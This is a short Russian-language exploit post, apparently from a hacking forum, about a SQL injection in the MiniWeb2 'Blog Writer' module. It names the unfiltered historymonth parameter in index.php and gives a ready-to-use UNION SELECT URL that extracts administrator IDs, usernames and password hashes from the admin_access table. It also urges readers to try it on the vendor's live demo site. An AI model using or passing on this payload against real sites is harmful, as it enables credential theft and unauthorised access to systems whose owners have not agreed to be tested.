Сайт производителя : http://www.miniweb2.com/15modules/blog-writer.htm Уязвимость: не фильтруется переменная в параметре historymonth, скрипта index.php Сплойт: PHP: http://localhost/index.php?historyyear=2007&historymonth=-12+union+select+1,2,concat(user_id,0x3a,username,0x3a,password),0,5,6,7,8,9,0+from+admin_access/* Потестить можно на демоверсии на сайте производителя. з\ы алгоритм шифрования пароля для меня остался загадкой
